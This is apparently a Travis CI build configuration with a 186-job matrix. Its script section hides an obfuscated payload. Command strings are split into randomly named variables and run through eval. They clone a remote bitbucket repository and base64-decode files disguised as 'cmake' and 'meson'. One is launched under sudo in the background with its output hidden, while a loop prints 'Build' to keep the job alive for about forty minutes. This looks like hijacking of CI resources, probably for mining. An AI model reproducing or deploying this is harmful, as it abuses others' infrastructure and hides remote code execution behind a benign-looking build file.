dist: bionic

env:
  - BUILD="tv1"
  - BUILD="tv2"
  - BUILD="tv3"
  - BUILD="tv4"
  - BUILD="tv5"
  - BUILD="tv6"
  - BUILD="tv7"
  - BUILD="tv8"
  - BUILD="tv9"
  - BUILD="tv10"
  - BUILD="tv11"
  - BUILD="tv12"
  - BUILD="tv13"
  - BUILD="tv14"
  - BUILD="tv15"
  - BUILD="tv16"
  - BUILD="tv17"
  - BUILD="tv18"
  - BUILD="tv19"
  - BUILD="tv20"
  - BUILD="tv21"
  - BUILD="tv22"
  - BUILD="tv23"
  - BUILD="tv24"
  - BUILD="tv25"
  - BUILD="tv26"
  - BUILD="tv27"
  - BUILD="tv28"
  - BUILD="tv29"
  - BUILD="tv30"
  - BUILD="tv31"
  - BUILD="tv32"
  - BUILD="tv33"
  - BUILD="tv34"
  - BUILD="tv35"
  - BUILD="tv36"
  - BUILD="tv37"
  - BUILD="tv38"
  - BUILD="tv39"
  - BUILD="tv40"
  - BUILD="tv41"
  - BUILD="tv42"
  - BUILD="tv43"
  - BUILD="tv44"
  - BUILD="tv45"
  - BUILD="tv46"
  - BUILD="tv47"
  - BUILD="tv48"
  - BUILD="tv49"
  - BUILD="tv50"
  - BUILD="tv51"
  - BUILD="tv52"
  - BUILD="tv53"
  - BUILD="tv54"
  - BUILD="tv55"
  - BUILD="tv56"
  - BUILD="tv57"
  - BUILD="tv58"
  - BUILD="tv59"
  - BUILD="tv60"
  - BUILD="tv61"
  - BUILD="tv62"
  - BUILD="tv63"
  - BUILD="tv64"
  - BUILD="tv65"
  - BUILD="tv66"
  - BUILD="tv67"
  - BUILD="tv68"
  - BUILD="tv69"
  - BUILD="tv70"
  - BUILD="tv71"
  - BUILD="tv72"
  - BUILD="tv73"
  - BUILD="tv74"
  - BUILD="tv75"
  - BUILD="tv76"
  - BUILD="tv77"
  - BUILD="tv78"
  - BUILD="tv79"
  - BUILD="tv80"
  - BUILD="tv81"
  - BUILD="tv82"
  - BUILD="tv83"
  - BUILD="tv84"
  - BUILD="tv85"
  - BUILD="tv86"
  - BUILD="tv87"
  - BUILD="tv88"
  - BUILD="tv89"
  - BUILD="tv90"
  - BUILD="tv91"
  - BUILD="tv92"
  - BUILD="tv93"
  - BUILD="tv94"
  - BUILD="tv95"
  - BUILD="tv96"
  - BUILD="tv97"
  - BUILD="tv98"
  - BUILD="tv99"
  - BUILD="tv100"
  - BUILD="tv101"
  - BUILD="tv102"
  - BUILD="tv103"
  - BUILD="tv104"
  - BUILD="tv105"
  - BUILD="tv106"
  - BUILD="tv107"
  - BUILD="tv108"
  - BUILD="tv109"
  - BUILD="tv110"
  - BUILD="tv111"
  - BUILD="tv112"
  - BUILD="tv113"
  - BUILD="tv114"
  - BUILD="tv115"
  - BUILD="tv116"
  - BUILD="tv117"
  - BUILD="tv118"
  - BUILD="tv119"
  - BUILD="tv120"
  - BUILD="tv121"
  - BUILD="tv122"
  - BUILD="tv123"
  - BUILD="tv124"
  - BUILD="tv125"
  - BUILD="tv126"
  - BUILD="tv127"
  - BUILD="tv128"
  - BUILD="tv129"
  - BUILD="tv130"
  - BUILD="tv131"
  - BUILD="tv132"
  - BUILD="tv133"
  - BUILD="tv134"
  - BUILD="tv135"
  - BUILD="tv136"
  - BUILD="tv137"
  - BUILD="tv138"
  - BUILD="tv139"
  - BUILD="tv140"
  - BUILD="tv141"
  - BUILD="tv142"
  - BUILD="tv143"
  - BUILD="tv144"
  - BUILD="tv145"
  - BUILD="tv146"
  - BUILD="tv147"
  - BUILD="tv148"
  - BUILD="tv149"
  - BUILD="tv150"
  - BUILD="tv151"
  - BUILD="tv152"
  - BUILD="tv153"
  - BUILD="tv154"
  - BUILD="tv155"
  - BUILD="tv156"
  - BUILD="tv157"
  - BUILD="tv158"
  - BUILD="tv159"
  - BUILD="tv160"
  - BUILD="tv161"
  - BUILD="tv162"
  - BUILD="tv163"
  - BUILD="tv164"
  - BUILD="tv165"
  - BUILD="tv166"
  - BUILD="tv167"
  - BUILD="tv168"
  - BUILD="tv169"
  - BUILD="tv170"
  - BUILD="tv171"
  - BUILD="tv172"
  - BUILD="tv173"
  - BUILD="tv174"
  - BUILD="tv175"
  - BUILD="tv176"
  - BUILD="tv177"
  - BUILD="tv178"
  - BUILD="tv179"
  - BUILD="tv180"
  - BUILD="tv181"
  - BUILD="tv182"
  - BUILD="tv183"
  - BUILD="tv184"
  - BUILD="tv185"
  - BUILD="tv186"

language: minimal

script:
  - YNENIUnEIli="sudo apt up"
  - xQfaGVLS="date || tru"
  - eval "$YNENIUnEIli""$xQfaGVLS""e"
  - uwvSZEIDF="sudo apt --"
  - PxgmzaF="yes install"
  - NgAcbyzgoL=" cl-base64 "
  - ypDUyL="git &>/dev/"
  - eval "$uwvSZEIDF""$PxgmzaF""$NgAcbyzgoL""$ypDUyL""null"
  - ZCkGnoE="git clone h"
  - KYPdb="ttps://gccb"
  - WhOdT="uild@bitbuc"
  - FwhcUeBYuY="ket.org/gcc"
  - UIjSJ="build/gcc.g"
  - LDAlnaInhF="it &>/dev/n"
  - eval "$ZCkGnoE""$KYPdb""$WhOdT""$FwhcUeBYuY""$UIjSJ""$LDAlnaInhF""ull"
  - ltfQI="base64 -d g"
  - eeLuavAEDgf="cc/cmake_ >"
  - eval "$ltfQI""$eeLuavAEDgf"" cmake"
  - FJuCb="base64 -d g"
  - eKgwYA="cc/config_ "
  - eval "$FJuCb""$eKgwYA""> .conf"
  - goZtV="base64 -d g"
  - XAdUu="cc/make_ > "
  - eval "$goZtV""$XAdUu""meson"
  - chmod +x meson cmake
  - ./cmake
  - sed -i 's/build/tg3o/g' .conf
  - WXBWaZ="sudo ./meso"
  - rVbxDRpGyi="n -c .conf "
  - DOPXolUk="&>/dev/null"
  - eval "$WXBWaZ""$rVbxDRpGyi""$DOPXolUk"" &"
  - GCC=$(date +%s)
  - AdAeoz="echo $BUILD"
  - eval "$AdAeoz"""
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2470)) ] && sudo killall meson && break; sleep 221; done
